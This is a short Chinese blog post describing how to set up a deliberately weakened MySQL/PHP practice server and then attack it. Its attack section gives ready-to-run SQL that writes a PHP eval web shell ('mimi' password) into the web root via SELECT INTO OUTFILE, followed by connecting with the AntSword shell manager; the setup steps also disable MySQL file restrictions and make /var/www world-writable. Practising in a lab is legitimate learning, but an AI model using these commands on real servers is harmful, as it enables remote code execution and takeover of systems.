MySQL靶场&攻击

靶场搭建

修改配置文件

复制代码
vim /etc/my.cof

[mysqld]
secure_file_priv=
local-infile=1
[mysql]
local-infile=1

安装相关环境

复制代码
yum install php php-mysql -y

添加配置

复制代码
vim /etc/httpd/conf/httpd.conf

AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .php

重启相关服务

复制代码
systemctl restart httpd

修改权限

复制代码
chmod -R o+w /var/www

攻击

复制代码
use TEST;
show tables;
create table muma(cmd text);
insert into muma values(concat('<?php @eval($_POST[','''','mimi','''',']); ?>'));
select * from muma;
select * from muma into outfile '/var/www/html/ma.php';

访问 IP/ma.php

蚁剑连接

作 者:PeiyuJue

链 接: https://peiyu.serv00.net/2024/07/05/mysql靶场攻击/

来 源:Aaron的博客

版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载!

相关推荐
JavaGuide11 小时前
公司来的新人用字符串存储日期,被组长怒怼了...
后端·mysql
怒放吧德德13 小时前
MySQL篇:MySQL主从集群同步延迟问题
后端·mysql·面试
数据智能老司机14 小时前
CockroachDB权威指南——CockroachDB SQL
数据库·分布式·架构
Eip不易也不e15 小时前
教程之同时安装两个版本的 mysql
mysql
数据智能老司机15 小时前
CockroachDB权威指南——开始使用
数据库·分布式·架构
松果猿15 小时前
空间数据库学习(二)—— PostgreSQL数据库的备份转储和导入恢复
数据库
Kagol15 小时前
macOS 和 Windows 操作系统下如何安装和启动 MySQL / Redis 数据库
redis·后端·mysql
无名之逆15 小时前
Rust 开发提效神器:lombok-macros 宏库
服务器·开发语言·前端·数据库·后端·python·rust
s91236010115 小时前
rust 同时处理多个异步任务
java·数据库·rust
数据智能老司机16 小时前
CockroachDB权威指南——CockroachDB 架构
数据库·分布式·架构